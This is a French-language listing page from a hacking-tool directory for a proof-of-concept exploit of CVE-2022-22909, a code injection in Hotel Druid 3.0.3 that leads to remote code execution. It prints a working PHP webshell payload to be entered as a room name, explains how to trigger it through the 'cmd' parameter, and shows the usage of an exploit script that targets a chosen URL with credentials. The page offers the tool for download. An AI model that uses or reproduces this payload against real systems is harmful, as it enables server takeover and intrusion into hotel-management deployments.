Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0z09e/cve-2022-22909
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 - Injection de code menant à une exécution de code à distance

Voir le dépôt
55il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-22909

Description

Une vulnérabilité d'injection de code a été découverte dans l'application Hotel Druid v3.0.3, qu'un attaquant pourrait exploiter pour exécuter du code à distance sur le serveur. Pour une exploitation réussie, un attaquant doit avoir le privilège d'ajouter une nouvelle chambre.

Description de la vulnérabilité

La vulnérabilité se produit car les noms de chambres sont stockés dans un fichier nommé /dati/selectappartamenti.php en utilisant des guillemets doubles.

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Charge utile (payload)

Pour effectuer une exploitation réussie, ajoutez une chambre avec la charge utile suivante comme nom de chambre.

root@kitploit:~
{${system($_REQUEST[cmd])}}

Après avoir ajouté une nouvelle chambre, allez dans /dati/selectappartamenti.php et déclenchez la webshell en passant une commande via le paramètre cmd.

Utilisation

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Exemple

Si l'application n'a pas d'authentification. Utilisez l'option --noauth pour ne pas effectuer d'authentification.

Si le serveur a l'authentification activée, utilisez --username et --password pour vous authentifier.

Crédits

Chercheur et rédacteur de POC - 0z09e


Télécharger l’outil